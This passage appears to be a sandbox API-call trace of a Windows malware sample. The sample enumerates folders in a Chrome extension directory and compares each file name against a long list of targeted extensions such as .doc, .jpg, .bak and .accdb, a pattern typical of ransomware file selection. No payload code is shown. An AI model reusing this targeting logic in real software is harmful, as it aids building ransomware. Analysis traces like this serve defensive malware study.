(lpString1=".emz", lpString2="json") returned -1 [0052.831] lstrlenW (lpString=".epf") returned 4 [0052.831] lstrcmpiW (lpString1=".epf", lpString2="json") returned -1 [0052.831] lstrlenW (lpString=".eps") returned 4 [0052.831] lstrcmpiW (lpString1=".eps", lpString2="json") returned -1 [0052.831] lstrlenW (lpString=".epsf") returned 5 [0052.831] lstrcmpiW (lpString1=".epsf", lpString2=".json") returned -1 [0052.831] lstrlenW (lpString=".epsp") returned 5 [0052.831] lstrcmpiW (lpString1=".epsp", lpString2=".json") returned -1 [0052.831] lstrlenW (lpString=".erf") returned 4 [0052.831] lstrcmpiW (lpString1=".erf", lpString2="json") returned -1 [0052.831] lstrlenW (lpString=".exr") returned 4 [0052.831] lstrcmpiW (lpString1=".exr", lpString2="json") returned -1 [0052.831] lstrlenW (lpString=".f4v") returned 4 [0052.831] lstrcmpiW (lpString1=".f4v", lpString2="json") returned -1 [0052.831] lstrlenW (lpString=".fido") returned 5 [0052.831] lstrcmpiW (lpString1=".fido", lpString2=".json") returned -1 [0052.831] lstrlenW (lpString=".flm") returned 4 [0052.831] lstrcmpiW (lpString1=".flm", lpString2="json") returned -1 [0052.831] lstrlenW (lpString=".flv") returned 4 [0052.832] lstrcmpiW (lpString1=".flv", lpString2="json") returned -1 [0052.832] lstrlenW (lpString=".frm") returned 4 [0052.832] lstrcmpiW (lpString1=".frm", lpString2="json") returned -1 [0052.832] lstrlenW (lpString=".fxg") returned 4 [0052.832] lstrcmpiW (lpString1=".fxg", lpString2="json") returned -1 [0052.832] lstrlenW (lpString=".geo") returned 4 [0052.832] lstrcmpiW (lpString1=".geo", lpString2="json") returned -1 [0052.832] lstrlenW (lpString=".gif") returned 4 [0052.832] lstrcmpiW (lpString1=".gif", lpString2="json") returned -1 [0052.832] lstrlenW (lpString=".grs") returned 4 [0052.832] lstrcmpiW (lpString1=".grs", lpString2="json") returned -1 [0052.832] lstrlenW (lpString=".gz") returned 3 [0052.832] lstrcmpiW (lpString1=".gz", lpString2="son") returned -1 [0052.832] lstrlenW (lpString=".h") returned 2 [0052.832] lstrcmpiW (lpString1=".h", lpString2="on") returned -1 [0052.832] lstrlenW (lpString=".hdr") returned 4 [0052.832] lstrcmpiW (lpString1=".hdr", lpString2="json") returned -1 [0052.832] lstrlenW (lpString=".hpp") returned 4 [0052.832] lstrcmpiW (lpString1=".hpp", lpString2="json") returned -1 [0052.832] lstrlenW (lpString=".hta") returned 4 [0052.832] lstrcmpiW (lpString1=".hta", lpString2="json") returned -1 [0052.832] lstrlenW (lpString=".htc") returned 4 [0052.832] lstrcmpiW (lpString1=".htc", lpString2="json") returned -1 [0052.832] lstrlenW (lpString=".htm") returned 4 [0052.832] lstrcmpiW (lpString1=".htm", lpString2="json") returned -1 [0052.832] lstrlenW (lpString=".html") returned 5 [0052.832] lstrcmpiW (lpString1=".html", lpString2=".json") returned -1 [0052.832] lstrlenW (lpString=".icb") returned 4 [0052.832] lstrcmpiW (lpString1=".icb", lpString2="json") returned -1 [0052.832] lstrlenW (lpString=".ics") returned 4 [0052.832] lstrcmpiW (lpString1=".ics", lpString2="json") returned -1 [0052.832] lstrlenW (lpString=".iff") returned 4 [0052.832] lstrcmpiW (lpString1=".iff", lpString2="json") returned -1 [0052.832] lstrlenW (lpString=".inc") returned 4 [0052.832] lstrcmpiW (lpString1=".inc", lpString2="json") returned -1 [0052.832] lstrlenW (lpString=".indd") returned 5 [0052.833] lstrcmpiW (lpString1=".indd", lpString2=".json") returned -1 [0052.833] lstrlenW (lpString=".ini") returned 4 [0052.833] lstrcmpiW (lpString1=".ini", lpString2="json") returned -1 [0052.833] lstrlenW (lpString=".iqy") returned 4 [0052.833] lstrcmpiW (lpString1=".iqy", lpString2="json") returned -1 [0052.833] lstrlenW (lpString=".j2c") returned 4 [0052.833] lstrcmpiW (lpString1=".j2c", lpString2="json") returned -1 [0052.833] lstrlenW (lpString=".j2k") returned 4 [0052.833] lstrcmpiW (lpString1=".j2k", lpString2="json") returned -1 [0052.833] lstrlenW (lpString=".java") returned 5 [0052.833] lstrcmpiW (lpString1=".java", lpString2=".json") returned -1 [0052.833] lstrlenW (lpString=".jp2") returned 4 [0052.833] lstrcmpiW (lpString1=".jp2", lpString2="json") returned -1 [0052.833] lstrlenW (lpString=".jpc") returned 4 [0052.833] lstrcmpiW (lpString1=".jpc", lpString2="json") returned -1 [0052.833] lstrlenW (lpString=".jpe") returned 4 [0052.833] lstrcmpiW (lpString1=".jpe", lpString2="json") returned -1 [0052.833] lstrlenW (lpString=".jpeg") returned 5 [0052.833] lstrcmpiW (lpString1=".jpeg", lpString2=".json") returned -1 [0052.833] lstrlenW (lpString=".jpf") returned 4 [0052.833] lstrcmpiW (lpString1=".jpf", lpString2="json") returned -1 [0052.833] lstrlenW (lpString=".jpg") returned 4 [0052.833] lstrcmpiW (lpString1=".jpg", lpString2="json") returned -1 [0052.833] lstrlenW (lpString=".jpx") returned 4 [0052.833] lstrcmpiW (lpString1=".jpx", lpString2="json") returned -1 [0052.833] lstrlenW (lpString=".js") returned 3 [0052.833] lstrcmpiW (lpString1=".js", lpString2="son") returned -1 [0052.833] lstrlenW (lpString=".jsf") returned 4 [0052.833] lstrcmpiW (lpString1=".jsf", lpString2="json") returned -1 [0052.833] lstrlenW (lpString=".json") returned 5 [0052.833] lstrcmpiW (lpString1=".json", lpString2=".json") returned 0 [0052.833] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85264230, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85264a00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0052.833] FindClose (in: hFindFile=0x3ef1580 | out: hFindFile=0x3ef1580) returned 1 [0052.834] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4002500 | out: hHeap=0x570000) returned 1 [0052.834] FindNextFileW (in: hFindFile=0x3ef1680, lpFindFileData=0x353df30 | out: lpFindFileData=0x353df30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85264230, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85264230, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85264230, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="it", cAlternateFileName="")) returned 1 [0052.834] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it") returned 139 [0052.834] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it") returned 1 [0052.834] lstrlenW (lpString="it") returned 2 [0052.834] lstrcmpiW (lpString1="C:\\Windows", lpString2="it") returned -1 [0052.834] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfffe) returned 0x4002500 [0052.834] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it") returned 139 [0052.834] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\*", lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85264230, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85264230, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85264230, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef1580 [0052.834] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85264230, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85264230, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85264230, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.834] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85264230, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85264a00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0052.834] lstrlenW (lpString="messages.json") returned 13 [0052.834] lstrlenW (lpString=".1cd") returned 4 [0052.834] lstrcmpiW (lpString1=".1cd", lpString2="json") returned -1 [0052.834] lstrlenW (lpString=".3ds") returned 4 [0052.834] lstrcmpiW (lpString1=".3ds", lpString2="json") returned -1 [0052.834] lstrlenW (lpString=".3fr") returned 4 [0052.834] lstrcmpiW (lpString1=".3fr", lpString2="json") returned -1 [0052.834] lstrlenW (lpString=".3g2") returned 4 [0052.834] lstrcmpiW (lpString1=".3g2", lpString2="json") returned -1 [0052.834] lstrlenW (lpString=".3gp") returned 4 [0052.834] lstrcmpiW (lpString1=".3gp", lpString2="json") returned -1 [0052.834] lstrlenW (lpString=".7z") returned 3 [0052.834] lstrcmpiW (lpString1=".7z", lpString2="son") returned -1 [0052.834] lstrlenW (lpString=".accda") returned 6 [0052.834] lstrcmpiW (lpString1=".accda", lpString2="s.json") returned -1 [0052.834] lstrlenW (lpString=".accdb") returned 6 [0052.834] lstrcmpiW (lpString1=".accdb", lpString2="s.json") returned -1 [0052.834] lstrlenW (lpString=".accdc") returned 6 [0052.835] lstrcmpiW (lpString1=".accdc", lpString2="s.json") returned -1 [0052.835] lstrlenW (lpString=".accde") returned 6 [0052.835] lstrcmpiW (lpString1=".accde", lpString2="s.json") returned -1 [0052.835] lstrlenW (lpString=".accdt") returned 6 [0052.835] lstrcmpiW (lpString1=".accdt", lpString2="s.json") returned -1 [0052.835] lstrlenW (lpString=".accdw") returned 6 [0052.835] lstrcmpiW (lpString1=".accdw", lpString2="s.json") returned -1 [0052.835] lstrlenW (lpString=".adb") returned 4 [0052.835] lstrcmpiW (lpString1=".adb", lpString2="json") returned -1 [0052.835] lstrlenW (lpString=".adp") returned 4 [0052.835] lstrcmpiW (lpString1=".adp", lpString2="json") returned -1 [0052.835] lstrlenW (lpString=".ai") returned 3 [0052.835] lstrcmpiW (lpString1=".ai", lpString2="son") returned -1 [0052.835] lstrlenW (lpString=".ai3") returned 4 [0052.835] lstrcmpiW (lpString1=".ai3", lpString2="json") returned -1 [0052.835] lstrlenW (lpString=".ai4") returned 4 [0052.835] lstrcmpiW (lpString1=".ai4", lpString2="json") returned -1 [0052.835] lstrlenW (lpString=".ai5") returned 4 [0052.835] lstrcmpiW (lpString1=".ai5", lpString2="json") returned -1 [0052.835] lstrlenW (lpString=".ai6") returned 4 [0052.835] lstrcmpiW (lpString1=".ai6", lpString2="json") returned -1 [0052.835] lstrlenW (lpString=".ai7") returned 4 [0052.835] lstrcmpiW (lpString1=".ai7", lpString2="json") returned -1 [0052.835] lstrlenW (lpString=".ai8") returned 4 [0052.835] lstrcmpiW (lpString1=".ai8", lpString2="json") returned -1 [0052.835] lstrlenW (lpString=".anim") returned 5 [0052.835] lstrcmpiW (lpString1=".anim", lpString2=".json") returned -1 [0052.835] lstrlenW (lpString=".arw") returned 4 [0052.835] lstrcmpiW (lpString1=".arw", lpString2="json") returned -1 [0052.835] lstrlenW (lpString=".as") returned 3 [0052.835] lstrcmpiW (lpString1=".as", lpString2="son") returned -1 [0052.835] lstrlenW (lpString=".asa") returned 4 [0052.835] lstrcmpiW (lpString1=".asa", lpString2="json") returned -1 [0052.835] lstrlenW (lpString=".asc") returned 4 [0052.835] lstrcmpiW (lpString1=".asc", lpString2="json") returned -1 [0052.835] lstrlenW (lpString=".ascx") returned 5 [0052.835] lstrcmpiW (lpString1=".ascx", lpString2=".json") returned -1 [0052.836] lstrlenW (lpString=".asm") returned 4 [0052.836] lstrcmpiW (lpString1=".asm", lpString2="json") returned -1 [0052.836] lstrlenW (lpString=".asmx") returned 5 [0052.836] lstrcmpiW (lpString1=".asmx", lpString2=".json") returned -1 [0052.836] lstrlenW (lpString=".asp") returned 4 [0052.836] lstrcmpiW (lpString1=".asp", lpString2="json") returned -1 [0052.836] lstrlenW (lpString=".aspx") returned 5 [0052.836] lstrcmpiW (lpString1=".aspx", lpString2=".json") returned -1 [0052.836] lstrlenW (lpString=".asr") returned 4 [0052.836] lstrcmpiW (lpString1=".asr", lpString2="json") returned -1 [0052.836] lstrlenW (lpString=".asx") returned 4 [0052.836] lstrcmpiW (lpString1=".asx", lpString2="json") returned -1 [0052.836] lstrlenW (lpString=".avi") returned 4 [0052.836] lstrcmpiW (lpString1=".avi", lpString2="json") returned -1 [0052.836] lstrlenW (lpString=".avs") returned 4 [0052.836] lstrcmpiW (lpString1=".avs", lpString2="json") returned -1 [0052.836] lstrlenW (lpString=".backup") returned 7 [0052.836] lstrcmpiW (lpString1=".backup", lpString2="es.json") returned -1 [0052.836] lstrlenW (lpString=".bak") returned 4 [0052.836] lstrcmpiW (lpString1=".bak", lpString2="json") returned -1 [0052.836] lstrlenW (lpString=".bay") returned 4 [0052.836] lstrcmpiW (lpString1=".bay", lpString2="json") returned -1 [0052.836] lstrlenW (lpString=".bd") returned 3 [0052.836] lstrcmpiW (lpString1=".bd", lpString2="son") returned -1 [0052.836] lstrlenW (lpString=".bin") returned 4 [0052.836] lstrcmpiW (lpString1=".bin", lpString2="json") returned -1 [0052.836] lstrlenW (lpString=".bmp") returned 4 [0052.836] lstrcmpiW (lpString1=".bmp", lpString2="json") returned -1 [0052.836] lstrlenW (lpString=".bz2") returned 4 [0052.836] lstrcmpiW (lpString1=".bz2", lpString2="json") returned -1 [0052.836] lstrlenW (lpString=".c") returned 2 [0052.836] lstrcmpiW (lpString1=".c", lpString2="on") returned -1 [0052.836] lstrlenW (lpString=".cdr") returned 4 [0052.836] lstrcmpiW (lpString1=".cdr", lpString2="json") returned -1 [0052.836] lstrlenW (lpString=".cer") returned 4 [0052.837] lstrcmpiW (lpString1=".cer", lpString2="json") returned -1 [0052.837] lstrlenW (lpString=".cf") returned 3 [0052.837] lstrcmpiW (lpString1=".cf", lpString2="son") returned -1 [0052.837] lstrlenW (lpString=".cfc") returned 4 [0052.837] lstrcmpiW (lpString1=".cfc", lpString2="json") returned -1 [0052.837] lstrlenW (lpString=".cfm") returned 4 [0052.837] lstrcmpiW (lpString1=".cfm", lpString2="json") returned -1 [0052.837] lstrlenW (lpString=".cfml") returned 5 [0052.837] lstrcmpiW (lpString1=".cfml", lpString2=".json") returned -1 [0052.837] lstrlenW (lpString=".cfu") returned 4 [0052.837] lstrcmpiW (lpString1=".cfu", lpString2="json") returned -1 [0052.837] lstrlenW (lpString=".chm") returned 4 [0052.837] lstrcmpiW (lpString1=".chm", lpString2="json") returned -1 [0052.837] lstrlenW (lpString=".cin") returned 4 [0052.837] lstrcmpiW (lpString1=".cin", lpString2="json") returned -1 [0052.837] lstrlenW (lpString=".class") returned 6 [0052.837] lstrcmpiW (lpString1=".class", lpString2="s.json") returned -1 [0052.837] lstrlenW (lpString=".clx") returned 4 [0052.837] lstrcmpiW (lpString1=".clx", lpString2="json") returned -1 [0052.837] lstrlenW (lpString=".config") returned 7 [0052.837] lstrcmpiW (lpString1=".config", lpString2="es.json") returned -1 [0052.837] lstrlenW (lpString=".cpp") returned 4 [0052.837] lstrcmpiW (lpString1=".cpp", lpString2="json") returned -1 [0052.837] lstrlenW (lpString=".cr2") returned 4 [0052.837] lstrcmpiW (lpString1=".cr2", lpString2="json") returned -1 [0052.837] lstrlenW (lpString=".crt") returned 4 [0052.837] lstrcmpiW (lpString1=".crt", lpString2="json") returned -1 [0052.837] lstrlenW (lpString=".crw") returned 4 [0052.837] lstrcmpiW (lpString1=".crw", lpString2="json") returned -1 [0052.837] lstrlenW (lpString=".cs") returned 3 [0052.837] lstrcmpiW (lpString1=".cs", lpString2="son") returned -1 [0052.837] lstrlenW (lpString=".css") returned 4 [0052.837] lstrcmpiW (lpString1=".css", lpString2="json") returned -1 [0052.837] lstrlenW (lpString=".csv") returned 4 [0052.837] lstrcmpiW (lpString1=".csv", lpString2="json") returned -1 [0052.838] lstrlenW (lpString=".cub") returned 4 [0052.838] lstrcmpiW (lpString1=".cub", lpString2="json") returned -1 [0052.838] lstrlenW (lpString=".dae") returned 4 [0052.838] lstrcmpiW (lpString1=".dae", lpString2="json") returned -1 [0052.838] lstrlenW (lpString=".dat") returned 4 [0052.838] lstrcmpiW (lpString1=".dat", lpString2="json") returned -1 [0052.838] lstrlenW (lpString=".db") returned 3 [0052.838] lstrcmpiW (lpString1=".db", lpString2="son") returned -1 [0052.838] lstrlenW (lpString=".dbf") returned 4 [0052.838] lstrcmpiW (lpString1=".dbf", lpString2="json") returned -1 [0052.838] lstrlenW (lpString=".dbx") returned 4 [0052.838] lstrcmpiW (lpString1=".dbx", lpString2="json") returned -1 [0052.838] lstrlenW (lpString=".dc3") returned 4 [0052.838] lstrcmpiW (lpString1=".dc3", lpString2="json") returned -1 [0052.838] lstrlenW (lpString=".dcm") returned 4 [0052.838] lstrcmpiW (lpString1=".dcm", lpString2="json") returned -1 [0052.838] lstrlenW (lpString=".dcr") returned 4 [0052.838] lstrcmpiW (lpString1=".dcr", lpString2="json") returned -1 [0052.838] lstrlenW (lpString=".der") returned 4 [0052.838] lstrcmpiW (lpString1=".der", lpString2="json") returned -1 [0052.838] lstrlenW (lpString=".dib") returned 4 [0052.838] lstrcmpiW (lpString1=".dib", lpString2="json") returned -1 [0052.838] lstrlenW (lpString=".dic") returned 4 [0052.838] lstrcmpiW (lpString1=".dic", lpString2="json") returned -1 [0052.838] lstrlenW (lpString=".dif") returned 4 [0052.838] lstrcmpiW (lpString1=".dif", lpString2="json") returned -1 [0052.838] lstrlenW (lpString=".divx") returned 5 [0052.838] lstrcmpiW (lpString1=".divx", lpString2=".json") returned -1 [0052.838] lstrlenW (lpString=".djvu") returned 5 [0052.838] lstrcmpiW (lpString1=".djvu", lpString2=".json") returned -1 [0052.838] lstrlenW (lpString=".dng") returned 4 [0052.838] lstrcmpiW (lpString1=".dng", lpString2="json") returned -1 [0052.838] lstrlenW (lpString=".doc") returned 4 [0052.838] lstrcmpiW (lpString1=".doc", lpString2="json") returned -1 [0052.838] lstrlenW (lpString=".docm") returned 5 [0052.838] lstrcmpiW (lpString1=".docm", lpString2=".json") returned -1 [0052.838] lstrlenW (lpString=".docx") returned 5 [0052.839] lstrcmpiW (lpString1=".docx", lpString2=".json") returned -1 [0052.839] lstrlenW (lpString=".dot") returned 4 [0052.839] lstrcmpiW (lpString1=".dot", lpString2="json") returned -1 [0052.839] lstrlenW (lpString=".dotm") returned 5 [0052.839] lstrcmpiW (lpString1=".dotm", lpString2=".json") returned -1 [0052.839] lstrlenW (lpString=".dotx") returned 5 [0052.839] lstrcmpiW (lpString1=".dotx", lpString2=".json") returned -1 [0052.839] lstrlenW (lpString=".dpx") returned 4 [0052.839] lstrcmpiW (lpString1=".dpx", lpString2="json") returned -1 [0052.839] lstrlenW (lpString=".dqy") returned 4 [0052.839] lstrcmpiW (lpString1=".dqy", lpString2="json") returned -1 [0052.839] lstrlenW (lpString=".dsn") returned 4 [0052.839] lstrcmpiW (lpString1=".dsn", lpString2="json") returned -1 [0052.839] lstrlenW (lpString=".dt") returned 3 [0052.839] lstrcmpiW (lpString1=".dt", lpString2="son") returned -1 [0052.839] lstrlenW (lpString=".dtd") returned 4 [0052.839] lstrcmpiW (lpString1=".dtd", lpString2="json") returned -1 [0052.839] lstrlenW (lpString=".dwg") returned 4 [0052.839] lstrcmpiW (lpString1=".dwg", lpString2="json") returned -1 [0052.839] lstrlenW (lpString=".dwt") returned 4 [0052.839] lstrcmpiW (lpString1=".dwt", lpString2="json") returned -1 [0052.839] lstrlenW (lpString=".dx") returned 3 [0052.839] lstrcmpiW (lpString1=".dx", lpString2="son") returned -1 [0052.839] lstrlenW (lpString=".dxf") returned 4 [0052.839] lstrcmpiW (lpString1=".dxf", lpString2="json") returned -1 [0052.839] lstrlenW (lpString=".edml") returned 5 [0052.839] lstrcmpiW (lpString1=".edml", lpString2=".json") returned -1 [0052.839] lstrlenW (lpString=".efd") returned 4 [0052.839] lstrcmpiW (lpString1=".efd", lpString2="json") returned -1 [0052.839] lstrlenW (lpString=".elf") returned 4 [0052.839] lstrcmpiW (lpString1=".elf", lpString2="json") returned -1 [0052.839] lstrlenW (lpString=".emf") returned 4 [0052.839] lstrcmpiW (lpString1=".emf", lpString2="json") returned -1 [0052.839] lstrlenW (lpString=".emz") returned 4 [0052.839] lstrcmpiW (lpString1=".emz", lpString2="json") returned -1 [0052.839] lstrlenW (lpString=".epf") returned 4 [0052.840] lstrcmpiW (lpString1=".epf", lpString2="json") returned -1 [0052.840] lstrlenW (lpString=".eps") returned 4 [0052.840] lstrcmpiW (lpString1=".eps", lpString2="json") returned -1 [0052.840] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85264230, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85264a00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0052.840] FindClose (in: hFindFile=0x3ef1580 | out: hFindFile=0x3ef1580) returned 1 [0052.840] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4002500 | out: hHeap=0x570000) returned 1 [0052.840] FindNextFileW (in: hFindFile=0x3ef1680, lpFindFileData=0x353df30 | out: lpFindFileData=0x353df30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85264230, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85264230, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85264230, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja", cAlternateFileName="")) returned 1 [0052.840] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85264230, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85264230, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85264230, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.840] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85264230, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85264a00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0052.840] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85264230, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85264a00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0052.840] FindClose (in: hFindFile=0x3ef1580 | out: hFindFile=0x3ef1580) returned 1 [0052.840] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4002500 | out: hHeap=0x570000) returned 1 [0052.840] FindNextFileW (in: hFindFile=0x3ef1680, lpFindFileData=0x353df30 | out: lpFindFileData=0x353df30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85264230, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85264230, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85264230, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko", cAlternateFileName="")) returned 1 [0052.840] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85264230, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85264230, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85264230, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.840] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85264230, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85264a00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0052.841] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85264230, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85264a00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0052.841] FindClose (in: hFindFile=0x3ef1580 | out: hFindFile=0x3ef1580) returned 1 [0052.841] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4002500 | out: hHeap=0x570000) returned 1 [0052.841] FindNextFileW (in: hFindFile=0x3ef1680, lpFindFileData=0x353df30 | out: lpFindFileData=0x353df30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8528a390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8528a390, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8528a390, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="lt", cAlternateFileName="")) returned 1 [0052.841] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8528a390, 